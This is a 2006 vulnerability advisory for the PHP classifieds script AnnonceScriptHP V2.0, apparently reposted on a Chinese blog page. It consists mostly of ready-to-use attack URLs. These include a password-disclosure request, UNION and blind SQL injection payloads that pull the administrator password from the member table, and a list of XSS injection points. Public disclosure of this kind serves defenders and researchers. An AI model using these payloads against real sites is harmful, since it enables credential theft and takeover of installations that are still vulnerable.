annonce.php,CVE-2006-6480 CVE-2006-6479 CVE-2006-6478 AnnonceScriptHP V2.0 Multiple Vulnerabilitie...

AnnonceScriptHP V2.0

--------------------

Vendor site: http://www.scripthp.com/

Product: AnnonceScriptHP V2.0

Vulnerability: XSS & SQL Injection Vulnerability

Credits: Mr_KaLiMaN

Reported to Vendor: 02/12/06

Public disclosure: 09/12/06

Description:

------------

Password disclosure (all members):

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=1 (1 for admin etc...)

SQL Injection Vulnerability:

http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION]

http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre WHERE idmembre=1#

http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]

http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph

p?idmembre=-1 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu

ll,null,null,null FROM etc...#

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p

hp?idannonce=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p

hp?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,nul

l,null,null,null,null#

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.

php?idannonce=[SQL INJECTION]

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.

php?idannonce=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

XSS :

http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS]

http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS

]

http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XS

S]

http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XS

S]

http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email=

[XSS]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值